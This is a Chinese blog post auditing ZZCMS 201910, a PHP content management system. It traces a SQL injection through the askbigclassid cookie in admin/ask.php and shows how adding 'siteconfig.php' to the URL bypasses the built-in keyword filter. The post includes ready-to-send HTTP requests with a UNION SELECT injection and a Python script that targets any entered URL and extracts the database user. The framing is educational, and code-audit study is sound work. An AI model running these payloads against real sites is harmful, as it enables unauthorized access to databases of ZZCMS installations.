当前位置:   article > 正文

ZZCMS201910代码审计

zzcms201910

一、sql注入漏洞原理及其分析

现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。

先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE["askbigclassid"]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击

$sql = "select * from zzcms_askclass where parentid=" . $_COOKIE["askbigclassid"] . " order by xuhao asc";
$sql = "select * from zzcms_askclass where parentid=-1 union select 1,2,3,4,5,6,7,8,9,10,11 order by xuhao asc";

因为是白盒测试,这里我们可以先将此查询语句放入数据库中查询看其会返回什么值,因为在日常的sql注入中我们知道sql注入回显的地方可能是返回某一字段,这里首先看一下这个sql语句是查询的是什么东西。以及检测构造后的查询语句是否可以正常查询。

这里成功返回查询成功的值,此时再去测试,因为这里的$_COOKIE["askbigclassid"]参数可控,所以我们这里先去测试之前构造的sql语句看是否可以成功执行。

查询过后发现可以成功执行。接下来在思考之前构造的sql语句可以成功执行,但是不知道这个这个查询的结果在哪显示。相对来说,不是很完美,接下来就要去寻找,这个sql语句查询的结果在哪里,通过审计得知他最后会出现在一个标签里,这里岂不是很完美,及查询了结果又把结果打印出来。 

这里大概解释一下这里的执行过程,首先通过判断$_COOKIE["askbigclassid"]的值是否为空,如果不等于空 会执行$sql所定义的sql语句。query()这个函数的作用是执行当前的sql语句,假设之前通过各种绕过来到了这个地方这里执行的sql语句会是。

$sql = "select * from zzcms_askclass where parentid=-1 union select database(),2,3,4,5,6,7,8,9,10,11 order by xuhao asc";

这里就会去执行这个查询语句,是不是就完成了一次sql查询,然后通过fetch_array()这个函数将所查询的结果遍历出来最后打印出classid这个字段的内容。现在开始去想,我已经知道了这个漏洞存在,但是要怎么执行才能触发这个漏洞,这里也就是代码审计的魅力,通过观察上下文发现,这个可能存在漏洞的地方是在add()这个函数中,那现在的思路,我是不是只需要去调用这个函数,并且将$_COOKIE["askbigclassid"]这个地方的值赋值为查询的sql语句也就是$askbigclass = -1 union select 1,2,3,4,5,6,7,8,9,10,11这样就可以执行攻击,接下来就去看在什么时候去调用这个add()函数。

通过审计发现在admin/ask.php文件中第53行有一个调用add()函数的东西,这里是不是就可以通过构造payload来进行一波测试。 

  1. GET /zzcms/admin/ask.php?do=add HTTP/1.1
  2. Host: localhost
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Cookie: askbigclassid=-1 union select database(),2,3,4,5,6,7,8,9,10,11
  9. Upgrade-Insecure-Requests: 1
  10. Sec-Fetch-Dest: document
  11. Sec-Fetch-Mode: navigate
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-User: ?1

构造请求包发包结果有waf,发现得绕waf。

因为不管什么cms 还是什么东西他的本质上就是代码,所打印的东西大概率都是代码中所有的字段,不可能无中生有,此时,我们就可以通过搜索这个提示字段找到他所在的代码,在进行审计,看是否可以进行其他绕过。 

通过搜索我们发现在inc/stopsqlin.php。

存在这个字符串,大概浏览了一下这个可能就是此cms所自带的一个waf这里开始审计看是否可以绕过。

这里审计得知在

这里是一段php代码解释一下,首先通过if判断$_REQUSET这个变量是否为空 如果不为空执行下面的语句,这里是一个全局变量检查,通过zc_check()这个函数将所有传入的GET和POST还有cookie都进行检测看起是否有危险字符因为在之前payload的包中使用cookie传的sql语句,这里也就是为什么他会显示有select危险字符不让执行的原因,extract()这个函数可以在上下文中产生一个新的变量,在赋值给一个值,这里可以理解为在上下文中定义一个自己的变量。下面是extract()这个函数例子。

之前说到首先传入的参数会进入zc_check()这个函数中进行过滤,这里对zc_check()函数进行分析。 

  1. function zc_check($string){ //传入字符串,就是之前get或者post或者cookie传入的值
  2. if(!is_array($string)){ //判断字符串是否为空
  3. if(get_magic_quotes_gpc()){ //get_magic_quotes_gpc()
  4. return htmlspecialchars(trim($string)); //这里可以直接忽略在高版本的php中这个函数始终未FALSE
  5. }else{
  6. return addslashes(htmlspecialchars(trim($string)));
  7. }//通过htmlspecialchars函数对字符穿进行html实体化,来过滤xss 在通过addslashes这个函数来过滤sql注入
  8. }
  9. foreach($string as $k => $v) $string[$k] = zc_check($v);
  10. return $string;
  11. }

这里是addslashes函数的解释。

  1. <?php
  2. $str = addslashes('Shanghai is the "biggest" city in China.');
  3. echo($str);
  4. ?>
  5. 结果 Shanghai is the \"biggest\" city in China.

对 单引号(') 双引号(") 反斜杠(\) 都会进行转义来防止sql注入,然后通过foreach()函数进行对字符串的提取 也就是将,假设现在有一个这样的GET请求?do=add 他的作用就是将do变成$do add变成字符串 $do=add ,然后对add在进行一般过滤,然后返回最后的字符串结果。

然后通过$_url来获取当前所请求的路径,在对当前的路径通过stopsqlin()函数进行检测过滤

这里先分析下stopsqllin()函数。

  1. function stopsqlin($str){
  2. if(!is_array($str)) {//有数组数据会传过来比如代理留言中的省份$_POST['province'][$i]
  3. $str=strtolower($str);//否则过过滤不全
  4. $sql_injdata = "";
  5. $sql_injdata= $sql_injdata."|".stopwords;
  6. $sql_injdata=CutFenGeXian($sql_injdata,"|");
  7. $sql_inj = explode("|",$sql_injdata);
  8. for ($i=0; $i< count($sql_inj);$i++){
  9. if (@strpos($str,$sql_inj[$i])!==false) {showmsg ("参数中含有非法字符 [".$sql_inj[$i]."] 系统不与处理");}
  10. }
  11. }
  12. }
  13. define('stopwords','select|update|and|or|delete|insert|truncate|char|into|iframe|script|得普利麻|易瑞沙|益赛普|赫赛汀|日达仙|百泌达|多吉美|拜科奇|赛美维|施多宁|派罗欣|妥塞敏|格列卫|特罗凯|手机窃听器|手枪') ;//网站禁用关键字

首先将|这个符合和他所定义的字符串连接,通过|为标志将他的字符串打散,变成单个字符串然后与GET和COOKIE和POST 传进去的参数进行判断如果有这些危险字符将停止程序运行。

这里的strpos()函数的作用是strpos($r_url,"template.php")在$_url中找siteconfig.php这个字符串如果找到就返回第一次出现的位置,没有返回0。

  1. if (checksqlin=="Yes") {
  2. if (strpos($r_url,"siteconfig.php")==0
  3. && strpos($r_url,"label")==0
  4. && strpos($r_url,"template.php")==0) {
  5. foreach ($_GET as $get_key=>$get_var){ stopsqlin($get_var);} /* 过滤所有GET过来的变量 */
  6. foreach ($_POST as $post_key=>$post_var){ stopsqlin($post_var); }/* 过滤所有POST过来的变量 */
  7. foreach ($_COOKIE as $cookie_key=>$cookie_var){ stopsqlin($cookie_var); }/* 过滤所有COOKIE过来的变量 */
  8. foreach ($_REQUEST as $request_key=>$request_var){ stopsqlin($request_var); }/* 过滤所有request过来的变量 */
  9. }
  10. }
  11. ?>

这里仔细看如果满足 if 的三个条件才会进入下面的stoplin()函数进行判断那么我这里是不是可以让他不满足这个if语句是不是就可以不去执行这个stopsqlin()这个函数,那么是不是就可以绕过sql注入检测,也就是网站自带的waf。

并且配合之前的extract()这个函数是不是就可以达到一个攻击效果了。

  1. strpos($r_url,"siteconfig.php")==0
  2. strpos($r_url,"label")==0
  3. strpos($r_url,"template.php")==0)
  4. //这里就是三个判断点,也就是绕过waf的关键点

先分析一次正常的请求过程。

首先GET和COOKIE参数 传入zc_check()中过滤,然后获得当前请求的url,通过判断,传入到stopsqlin()函数 进行检测,如果有危险字符就停止,否则就执行。

再分析一次非正常请求

首先GET和COOKIE参数 传入zc_check()中过滤,然后获得当前请求的url,通过判断,判断失败直接跳过stopsqlin()这个函数,也就不进行对危险字符检查,从而绕过这个waf。

这里开始对以上思路开始测试。

二、构造payload

  1. GET /zzcms/admin/ask.php?do=add&s=siteconfig.php HTTP/1.1
  2. Host: localhost
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Cookie: askbigclassid=-1 union select database(),2,3,4,5,6,7,8,9,10,11
  9. Upgrade-Insecure-Requests: 1
  10. Sec-Fetch-Dest: document
  11. Sec-Fetch-Mode: navigate
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-User: ?1

成功执行sql注入。

三、漏洞验证脚本

  1. # -*- coding: utf-8 -*-
  2. import requests
  3. import re
  4. from bs4 import BeautifulSoup
  5. from colorama import init,Fore
  6. init(autoreset=True)
  7. geturl = input("请输入网址:")
  8. headers = {
  9. "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36",
  10. }
  11. url = geturl+"/admin/ask.php?do=add&s=siteconfig.php"
  12. cookie = {"askbigclassid":"-1 union select user(),2,3,4,5,6,7,8,9,10,11"}
  13. try:
  14. Geturl = requests.get(url=url,cookies=cookie,headers=headers)
  15. soup = BeautifulSoup(Geturl.text,"lxml")
  16. test = soup.find_all("option")[2]
  17. test = str(test)
  18. jiansuo = re.search(r"<option value=(.*)>3</option>",test).group(1)
  19. if jiansuo == '\"root@localhost\"' :
  20. print("存在此sql注入漏洞")
  21. except:
  22. print("不存在此漏洞")

四、渗透测试的一些思考

一、此次代码审计明白了一些黑盒测试的攻击手段,以及一些攻击思路。

二、学会代码审计会极大的帮助对于漏洞的理解。

三、所谓的0day也就是通过代码审计审计出来,进行代码审计的同时画一些思维导图比较好理解一点。

四、代码审计时要注意哪些变量可控,忽略无用的代码,进行逆向回退,从可能存在漏洞的地方进行回溯审计。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/275159
推荐阅读
相关标签
  

闽ICP备14008679号